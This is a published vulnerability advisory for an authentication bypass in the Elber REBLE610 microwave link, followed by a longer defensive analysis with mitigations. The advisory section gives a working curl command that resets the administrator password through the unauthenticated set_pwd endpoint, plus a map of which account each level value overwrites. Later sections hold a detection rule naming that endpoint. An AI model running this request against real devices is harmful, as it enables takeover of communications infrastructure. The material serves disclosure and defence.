Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2024-05-04 
Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 0.01 Revision 0

Summary: The REBLE610 features an accurate hardware design, absence of
internal cabling and full modularity. The unit is composed by a basic
chassis with 4 extractable boards which makes maintenance and critical
operations, like frequency modification, easy and efficient. The modular
approach has brought to the development of the digital processing module
(containing modulator, demodulator and data interface) and the RF module
(containing Transmitter, Receiver and channel filters). From an RF point
of view, the new transmission circuitry is able to guarantee around 1 Watt
with every modulation scheme, introducing, in addition, wideband precorrection
(up to 1GHz depending on frequency band).

Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5818
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php


18.08.2023

--


$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)


Elber REBLE610 M/ODU XPIC IP-ASI-SDH — Authentication Bypass (Password Management API)

Executive summary

The Elber REBLE610 family of microwave radios was reported to contain an authentication bypass vulnerability in an unauthenticated password-management HTTP API. An unauthenticated request to the password setter endpoint can be used to overwrite account passwords, potentially granting administrative access to an attacker. This article explains the vulnerability class, likely causes, impact, detection strategies and concrete mitigation steps for operators and defenders.

Vulnerability overview

At a high level, the issue is a missing or insufficient access-control requirement on a server-side management endpoint that permits password changes without proper authentication or authorization. The vulnerable behavior typically manifests as a management API (HTTP/JSON endpoint) that accepts requests to set account passwords but does not verify the requesting principal or enforce strong authentication tokens.

Why this happens

  • Management API endpoints exposed via HTTP without authentication checks (authorization bypass).
  • Use of HTTP GET requests for state-changing operations (unsafe HTTP verbs increase risk of accidental or automated changes, and exacerbates CSRF/automation risks).
  • Insufficient input validation or lack of role-based access controls on the device firmware.
  • Default or undocumented maintenance endpoints kept for factory/service operations left enabled in production images.

Potential impact

  • Complete takeover of device management credentials (administrative lockout or takeover).
  • Modification of radio configuration, reboots, firmware replacement, traffic interception or service disruption.
  • Lateral movement: compromised radio can provide network access into management or transport networks.
  • Regulatory and availability impacts for critical communications links (service outages, degraded link performance).

Privileges and affected accounts

The endpoint in question accepts a parameter indicating the target account/privilege level. Understanding which levels map to which stored credentials is useful for defenders when assessing risk and remediation priority.

Level (example)Typical mapping
7SNMP write community (write community string)
6SNMP read community (read community string)
5Custom password (hidden/service account)
4Display or monitoring password
2Administrator password
1Super user / privileged user password
0Regular user password

Safe testing guidance (for operators & labs only)

All active testing must be performed only on devices you own or are explicitly authorized to test. Never run intrusive tests against production devices or devices you do not control. The following example is a non-destructive, defensive check pattern you can adapt in a controlled lab: enumerate whether the device exposes management endpoints and whether those endpoints require authentication, without changing device state.

// Pseudocode: non-destructive probe (lab use only)
// - Performs an HTTP HEAD/GET to enumerate presence of management endpoints.
// - Does NOT change any passwords or alter device state.

http_request = {
  method: "HEAD",
  url: "http://[device-ip]/json_data/set_pwd",
  timeout: 10
}
response = send_http_request(http_request)
if response.status_code == 200 then
  log("Management endpoint reachable without auth — requires immediate review")
else
  log("Endpoint not reachable or requires auth")
end

Explanation: The pseudocode performs a non-destructive HEAD request to detect whether the password-management endpoint exists and is reachable. It intentionally avoids sending parameters that would change device state. Use such probes only in lab environments or when you have permission to test.

Detection and monitoring

  • Network IDS/IPS: create rules to alert on HTTP requests attempting to access management endpoints from non-management subnets.
  • SIEM: alert on unusual password change events, especially originating from unexpected sources or outside scheduled maintenance windows.
  • Device logs: monitor authentication logs, management API access logs, and sudden changes to SNMP communities or admin credentials.
  • Configuration drift detection: compare running configuration vs. baselined config and alert on credential changes or unexpected write operations.
# Example Suricata/IDS rule (defensive)
# Alert on HTTP requests containing management path from non-management ranges
alert http any any -> $HOME_NET any (msg:"ELBER REBLE610: password-admin endpoint access"; http.uri; content:"/json_data/set_pwd"; nocase; sid:1000001; rev:1;)

Explanation: This IDS rule triggers when an HTTP request to the management password endpoint is observed. Use it to detect suspicious attempts. Tune source networks and thresholds to reduce false positives.

Recommended mitigations and hardening steps

  • Apply official firmware updates: consult Elber for firmware patches that close the authentication bypass. Vendor patches are the definitive fix.
  • Restrict management-plane access: only allow access to device management interfaces from a limited set of trusted management networks or jump hosts (ACLs, firewall rules).
  • Disable unneeded service endpoints: remove or disable any undocumented or service-mode endpoints in production builds.
  • Enforce authenticated and encrypted management: require strong authentication (local accounts + role-based access or centralized AAA) and HTTPS/TLS for web management.
  • Rotate and protect credentials: change default credentials, enforce strong passwords, and rotate SNMP community strings and admin passwords after remediation.
  • Network segmentation: isolate microwave/transport equipment on separate management VLANs with strict routing and firewall controls.
  • Logging and alerting: ensure device logs are forwarded to a centralized collector and alerts are configured for credential changes.
  • Change management: implement approval/multi-step password operations for high-privilege changes where possible.

Immediate compensation controls (quick fixes)

  • Block HTTP/management access to the device from the public internet and untrusted subnets using perimeter firewalls.
  • Restrict access to the device IP to a small set of admin workstation IPs:
# Example iptables defensive rule: allow only admin subnet to reach HTTP(80)
# Replace  and  before use.
iptables -I INPUT -p tcp -s  -d  --dport 80 -j ACCEPT
iptables -I INPUT -p tcp -d  --dport 80 -j DROP

Explanation: These rules allow only a trusted admin subnet to reach port 80 on the device and drop other access. This is a stopgap when firmware fixes are not yet available. Always test rules in a staging environment and ensure legitimate management sessions are preserved.

Incident response checklist

  • Disconnect affected device from management networks if compromise is suspected.
  • Collect logs (device, network, and jump hosts) to determine scope and timeline of changes.
  • Reset credentials and rotate keys after re-imaging or confirming device integrity.
  • Replace firmware with a patched, vendor-approved version and validate integrity (checksums/signatures).
  • Review adjacent systems for lateral movement and remediate as necessary.

Vendor coordination and responsible disclosure

If you discover the vulnerability in your environment, coordinate with the vendor (Elber S.r.l.) to obtain a patch or recommended mitigation. Follow responsible disclosure practices: share technical details privately with the vendor and allow time for a fix before public disclosure. For operators, ask for CVE or advisory references and track vendor advisories for firmware revisions.

Key takeaways

  • APIs and web management endpoints must never allow state-changing operations without proper authentication and authorization.
  • Network-level controls (ACLs, segmentation) and logging provide strong compensating controls when firmware fixes are pending.
  • Detecting and alerting on management endpoint access is essential for early warning and containment.
  • Always test fixes and access controls in a controlled environment before rolling them into production.